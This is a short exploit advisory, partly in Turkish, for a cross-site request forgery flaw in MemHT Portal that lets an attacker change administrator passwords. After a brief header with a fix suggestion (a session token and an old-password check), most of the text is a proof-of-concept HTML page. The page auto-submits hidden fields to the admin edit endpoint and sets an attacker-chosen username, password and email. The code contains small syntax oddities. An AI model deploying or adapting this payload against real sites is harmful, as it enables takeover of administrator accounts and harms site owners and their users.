< ------------------- header data start ------------------- >

#############################################################

# Application Name : MemHT Portal

# Vulnerable Type : Cross Site Request Forgery

# Infection : Yönetici ve user sifreleri uzaktan degisilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<Form Action=http://www.site.com/admin.php?page=administrators&op=editAdmin&id=2&ok=true method=post name=BizaRRo >
<input type=’hidden’ name=’pusername’ size=’20’ maxlength=’255’ value=bizo >
<input type=’hidden’ name=’ppass’ size=’20’ maxlength=’255’ value=bizo >
<input type=’hidden’ name=’pemail’ size=’30’ maxlength=’255’ value=[email protected] >
<option value=’1’ selected>
<input type=’submit’ name=’Submit’ value=’modify’>

< -- bug code end of -- >